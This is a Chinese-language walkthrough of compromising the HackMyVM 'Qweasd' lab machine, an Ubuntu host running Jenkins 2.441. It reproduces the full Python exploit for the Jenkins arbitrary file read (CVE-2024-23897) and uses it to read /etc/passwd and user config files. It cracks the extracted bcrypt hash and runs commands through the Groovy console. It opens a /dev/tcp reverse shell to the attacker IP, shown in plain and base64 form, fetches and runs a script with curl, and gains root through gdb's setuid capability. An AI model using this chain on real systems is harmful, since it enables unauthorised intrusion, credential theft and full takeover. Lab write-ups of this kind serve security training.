HackMyVM Qweasd

┌──(root㉿kali)-[~]
└─# arp-scan -I eth1 -l
Interface: eth1, type: EN10MB, MAC: 00:0c:29:26:ba:73, IPv4: 192.168.56.102
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:13       (Unknown: locally administered)
192.168.56.100  08:00:27:17:db:03       PCS Systemtechnik GmbH
192.168.56.117  08:00:27:52:a0:a6       PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.185 seconds (117.16 hosts/sec). 3 responded
                                                                                                                                                                                                                            
┌──(root㉿kali)-[~]
└─# nmap -Pn -A -sV -T4 -p- 192.168.56.117
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-26 06:00 EST
Nmap scan report for 192.168.56.117
Host is up (0.00034s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 fa:b1:dc:5b:9e:54:8c:bd:24:4c:43:0c:25:fd:4d:d8 (ECDSA)
|_  256 29:71:69:ca:bc:74:48:26:45:34:77:69:29:a5:d2:fc (ED25519)
8080/tcp open  http    Jetty 10.0.18
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Jetty(10.0.18)
|_http-title: Starting Jenkins
MAC Address: 08:00:27:52:A0:A6 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.34 ms 192.168.56.117

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.97 seconds

请求时发现一直在请求一个5.32的ip，禁用

右下角直接看到

┌──(root㉿kali)-[~]
└─# searchsploit Jenkins 2.441            
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                                                                            |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Jenkins 2.441 - Local File Inclusion                                                                                                                                                      | java/webapps/51993.py
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
                                                                                                                                                                                                                            
┌──(root㉿kali)-[~]
└─# searchsploit -m java/webapps/51993.py 
  Exploit: Jenkins 2.441 - Local File Inclusion
      URL: https://www.exploit-db.com/exploits/51993
     Path: /usr/share/exploitdb/exploits/java/webapps/51993.py
    Codes: CVE-2024-23897
 Verified: False
File Type: Python script, ASCII text executable
Copied to: /root/51993.py


                                                                                                                                                                                                                            
┌──(root㉿kali)-[~]
└─# cat 51993.py                                           
# Exploit Title: Jenkins 2.441 - Local File Inclusion
# Date: 14/04/2024
# Exploit Author: Matisse Beckandt (Backendt)
# Vendor Homepage: https://www.jenkins.io/
# Software Link: https://github.com/jenkinsci/jenkins/archive/refs/tags/jenkins-2.441.zip
# Version: 2.441
# Tested on: Debian 12 (Bookworm)
# CVE: CVE-2024-23897

from argparse import ArgumentParser
from requests import Session, post, exceptions
from threading import Thread
from uuid import uuid4
from time import sleep
from re import findall

class Exploit(Thread):
  def __init__(self, url: str, identifier: str):
    Thread.__init__(self)
    self.daemon = True
    self.url = url
    self.params = {"remoting": "false"}
    self.identifier = identifier
    self.stop_thread = False
    self.listen = False

  def run(self):
    while not self.stop_thread:
      if self.listen:
        self.listen_and_print()

  def stop(self):
    self.stop_thread = True

  def receive_next_message(self):
    self.listen = True

  def wait_for_message(self):
    while self.listen:
      sleep(0.5)

  def print_formatted_output(self, output: str):
    if "ERROR: No such file" in output:
      print("File not found.")
    elif "ERROR: Failed to parse" in output:
      print("Could not read file.")

    expression = "No such agent \"(.*)\" exists."
    results = findall(expression, output)
    print("\n".join(results))

  def listen_and_print(self):
    session = Session()
    headers = {"Side": "download", "Session": self.identifier}
    try:
      response = session.post(self.url, params=self.params, headers=headers)
    except (exceptions.ConnectTimeout, exceptions.ConnectionError):
      print("Could not connect to target to setup the listener.")
      exit(1)

    self.print_formatted_output(response.text)
    self.listen = False

  def send_file_request(self, filepath: str):
    headers = {"Side": "upload", "Session": self.identifier}
    payload = get_payload(filepath)
    try:
      post(self.url, data=payload, params=self.params, headers=headers, timeout=4)
    except (exceptions.ConnectTimeout, exceptions.ConnectionError):
      print("Could not connect to the target to send the request.")
      exit(1)

  def read_file(self, filepath: str):
    self.receive_next_message()
    sleep(0.1)
    self.send_file_request(filepath)
    self.wait_for_message()

def get_payload_message(operation_index: int, text: str) -> bytes:
  text_bytes = bytes(text, "utf-8")
  text_size = len(text_bytes)
  text_message = text_size.to_bytes(2) + text_bytes
  message_size = len(text_message)

  payload = message_size.to_bytes(4) + operation_index.to_bytes(1) + text_message
  return payload

def get_payload(filepath: str) -> bytes:
  arg_operation = 0
  start_operation = 3

  command = get_payload_message(arg_operation, "connect-node")
  poisoned_argument = get_payload_message(arg_operation, f"@{filepath}")

  payload = command + poisoned_argument + start_operation.to_bytes(1)
  return payload

def start_interactive_file_read(exploit: Exploit):
  print("Press Ctrl+C to exit")
  while True:
    filepath = input("File to download:\n> ")
    filepath = make_path_absolute(filepath)
    exploit.receive_next_message()

    try:
      exploit.read_file(filepath)
    except exceptions.ReadTimeout:
      print("Payload request timed out.")

def make_path_absolute(filepath: str) -> str:
    if not filepath.startswith('/'):
      return f"/proc/self/cwd/{filepath}"
    return filepath

def format_target_url(url: str) -> str:
  if url.endswith('/'):
    url = url[:-1]
  return f"{url}/cli"

def get_arguments():
  parser = ArgumentParser(description="Local File Inclusion exploit for CVE-2024-23897")
  parser.add_argument("-u", "--url", required=True, help="The url of the vulnerable Jenkins service. Ex: http://helloworld.com/")
  parser.add_argument("-p", "--path", help="The absolute path of the file to download")
  return parser.parse_args()

def main():
  args = get_arguments()
  url = format_target_url(args.url)
  filepath = args.path
  identifier = str(uuid4())

  exploit = Exploit(url, identifier)
  exploit.start()

  if filepath:
    filepath = make_path_absolute(filepath)
    exploit.read_file(filepath)
    exploit.stop()
    return

  try:
    start_interactive_file_read(exploit)
  except KeyboardInterrupt:
    pass
  print("\nQuitting")
  exploit.stop()

if __name__ == "__main__":
  main()                                                                                                                                                                                                                            
┌──(root㉿kali)-[~]
└─# 

┌──(root㉿kali)-[~]
└─# python3 51993.py -u http://192.168.56.117:8080/    
Press Ctrl+C to exit
File to download:
> /etc/passwd
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
dnsmasq:x:113:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
penetration:x:1001:1001::/home/penetration:/bin/bash
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
kali:x:1000:1000:asd:/home/kali:/bin/bash
root:x:0:0:root:/root:/bin/bash
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
syslog:x:107:113::/home/syslog:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
games:x:5:60:games:/usr/games:/usr/sbin/nologin
File to download:
> 

同理也能拿user flag

直接爆破ssh

┌──(root㉿kali)-[/tmp]
└─# vi user.txt  
                                                                                                          
┌──(root㉿kali)-[/tmp]
└─# cp /root/yiyi/rockyou.txt /tmp
                                                   

找到了一个密码

但是好像没卵用

查资料发现jenkins的配置文件在/home/user/.jenkins下，发现配置文件

Jenkins 任意文件读取(CVE-2024-23897)+后台用户密码提取哈希破解+反弹Shell 一条龙-CSDN博客

> /home/penetration/.jenkins/config.xml
  <primaryView>all</primaryView>
  <label></label>
  <clouds/>
  <disabledAdministrativeMonitors/>
  </authorizationStrategy>
<hudson>
    <excludeClientIPFromCrumb>false</excludeClientIPFromCrumb>
    </hudson.model.AllView>
  </crumbIssuer>
  <disableRememberMe>false</disableRememberMe>
  <authorizationStrategy class="hudson.security.FullControlOnceLoggedInAuthorizationStrategy">
  <slaveAgentPort>-1</slaveAgentPort>
  <viewsTabBar class="hudson.views.DefaultViewsTabBar"/>
</hudson>
  <numExecutors>2</numExecutors>
    <disableSignup>true</disableSignup>
      <properties class="hudson.model.View$PropertyList"/>
  </views>
  <globalNodeProperties/>
    <enableCaptcha>false</enableCaptcha>
  <workspaceDir>${JENKINS_HOME}/workspace/${ITEM_FULL_NAME}</workspaceDir>
    <denyAnonymousReadAccess>false</denyAnonymousReadAccess>
  <scmCheckoutRetryCount>0</scmCheckoutRetryCount>
<?xml version='1.1' encoding='UTF-8'?>
  </securityRealm>
  <projectNamingStrategy class="jenkins.model.ProjectNamingStrategy$DefaultProjectNamingStrategy"/>
  <crumbIssuer class="hudson.security.csrf.DefaultCrumbIssuer">
      <name>all</name>
  <nodeProperties/>
  <markupFormatter class="hudson.markup.EscapedMarkupFormatter"/>
  <views>
  <useSecurity>true</useSecurity>
  <buildsDir>${ITEM_ROOTDIR}/builds</buildsDir>
  <jdks/>
  <version>2.441</version>
      <owner class="hudson" reference="../../.."/>
  <nodeRenameMigrationNeeded>false</nodeRenameMigrationNeeded>
      <filterExecutors>false</filterExecutors>
      <filterQueue>false</filterQueue>
  <securityRealm class="hudson.security.HudsonPrivateSecurityRealm">
  <myViewsTabBar class="hudson.views.DefaultMyViewsTabBar"/>
    <hudson.model.AllView>
  <mode>NORMAL</mode>
File to download:

还有users.xml

> /home/penetration/.jenkins/users/users.xml
<?xml version='1.1' encoding='UTF-8'?>
  <idToDirectoryNameMap class="concurrent-hash-map">
    <entry>
      <string>an0ma1_6703692303677686036</string>
  <version>1</version>
      <string>an0ma1</string>
</hudson.model.UserIdMapper>
  </idToDirectoryNameMap>
<hudson.model.UserIdMapper>
    </entry>

有一串字符

an0ma1_6703692303677686036

> /home/penetration/.jenkins/users/an0ma1_6703692303677686036/config.xml
    <hudson.search.UserSearchProperty>
      <roles>
    <jenkins.security.seed.UserSeedProperty>
    </hudson.search.UserSearchProperty>
      </tokenStore>
  <properties>
      <flags/>
    <jenkins.security.LastGrantedAuthoritiesProperty>
    <hudson.model.MyViewsProperty>
</user>
  <id>an0ma1</id>
    </jenkins.security.ApiTokenProperty>
      <views>
    <org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty plugin="display-url-api@2.200.vb_9327d658781">
        <string>authenticated</string>
<user>
          <name>all</name>
      <collapsed/>
    </jenkins.security.seed.UserSeedProperty>
    <com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty plugin="credentials@1337.v60b_d7b_c7b_c9f">
    </org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty>
    </hudson.model.MyViewsProperty>
      <domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash"/>
      <triggers/>
          <filterQueue>false</filterQueue>
      <passwordHash>#jbcrypt:$2a$10$3Ms0ektq3Nt8FBV8WeISb.Y.Xh81/VsOhZAhn5xhXzTZEFlsmGm76</passwordHash>
      </views>
    <jenkins.security.ApiTokenProperty>
    </hudson.model.PaneStatusProperties>
    </hudson.tasks.Mailer_-UserProperty>
      <emailAddress>1594743209@qq.com</emailAddress>
    <jenkins.console.ConsoleUrlProviderUserProperty/>
        <tokenList/>
        </hudson.model.AllView>
    </hudson.plugins.emailext.watching.EmailExtWatchAction_-UserProperty>
          <owner class="hudson.model.MyViewsProperty" reference="../../.."/>
  </properties>
      <timestamp>1712972655377</timestamp>
    <hudson.model.TimeZoneProperty/>
    </jenkins.model.experimentalflags.UserExperimentalFlagsProperty>
    </com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty>
      <insensitiveSearch>true</insensitiveSearch>
    <hudson.security.HudsonPrivateSecurityRealm_-Details>
          <properties class="hudson.model.View$PropertyList"/>
        <hudson.model.AllView>
    </hudson.security.HudsonPrivateSecurityRealm_-Details>
      <seed>e9885566be638620</seed>
      <providerId>default</providerId>
    <jenkins.model.experimentalflags.UserExperimentalFlagsProperty>
      </roles>
    </jenkins.security.LastGrantedAuthoritiesProperty>
    <hudson.model.PaneStatusProperties>
    <hudson.plugins.emailext.watching.EmailExtWatchAction_-UserProperty plugin="email-ext@2.105">
<?xml version='1.1' encoding='UTF-8'?>
  <version>10</version>
    <hudson.tasks.Mailer_-UserProperty plugin="mailer@472.vf7c289a_4b_420">
          <filterExecutors>false</filterExecutors>
      <tokenStore>
    <io.jenkins.plugins.thememanager.ThemeUserProperty plugin="theme-manager@215.vc1ff18d67920"/>
  <fullName>Mike</fullName>

hashcat跑一遍

hashcat -m 3200 -a 0 hash.txt rockyou.txt

369258

就可以成功登录了

println "cat /etc/passwd".execute().text

开始反弹shell

echo -n '/bin/sh -i >& /dev/tcp/192.168.56.102/4444 0>&1' | base64 -d | /bin/bash

echo -n 'L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjU2LjEwMi80NDQ0IDA+JjE=' | base64 -d | /bin/bash

写在渗透机并开启python httpserver

拉到靶机并执行

println "curl http://192.168.56.102/11.sh -o /tmp/11.sh".execute().text

println "chmod 777 /tmp/11a.sh".execute().text

println "/bin/bash /tmp/11.sh".execute().text

penetration@asd:/opt$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/snap/core20/2264/usr/bin/chfn
/snap/core20/2264/usr/bin/chsh
/snap/core20/2264/usr/bin/gpasswd
/snap/core20/2264/usr/bin/mount
/snap/core20/2264/usr/bin/newgrp
/snap/core20/2264/usr/bin/passwd
/snap/core20/2264/usr/bin/su
/snap/core20/2264/usr/bin/sudo
/snap/core20/2264/usr/bin/umount
/snap/core20/2264/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/2264/usr/lib/openssh/ssh-keysign
/snap/core20/1405/usr/bin/chfn
/snap/core20/1405/usr/bin/chsh
/snap/core20/1405/usr/bin/gpasswd
/snap/core20/1405/usr/bin/mount
/snap/core20/1405/usr/bin/newgrp
/snap/core20/1405/usr/bin/passwd
/snap/core20/1405/usr/bin/su
/snap/core20/1405/usr/bin/sudo
/snap/core20/1405/usr/bin/umount
/snap/core20/1405/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1405/usr/lib/openssh/ssh-keysign
/snap/snapd/15534/usr/lib/snapd/snap-confine
/usr/bin/umount
/usr/bin/passwd
/usr/bin/fusermount3
/usr/bin/sudo
/usr/bin/su
/usr/bin/pkexec
/usr/bin/mount
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chfn
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/libexec/polkit-agent-helper-1
penetration@asd:/opt$ sudo -l
sudo -l
Matching Defaults entries for penetration on asd:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User penetration may run the following commands on asd:
    (ALL) NOPASSWD: /opt/babyGift/vuln

getcap发现有/usr/bin/gdb cap_setuid=ep

penetration@asd:/opt$ getcap -r / 2>/dev/null
getcap -r / 2>/dev/null
/snap/core20/2264/usr/bin/ping cap_net_raw=ep
/snap/core20/1405/usr/bin/ping cap_net_raw=ep
/usr/bin/ping cap_net_raw=ep
/usr/bin/mtr-packet cap_net_raw=ep
/usr/bin/gdb cap_setuid=ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep
penetration@asd:/opt$ gdb -nx -ex 'python import os; os.setuid(0)' -ex '!sh' -ex quit
<'python import os; os.setuid(0)' -ex '!sh' -ex quit
GNU gdb (Ubuntu 13.1-2ubuntu2.1) 13.1
Copyright (C) 2023 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word".
# whoami
whoami
root
# 

完结撒花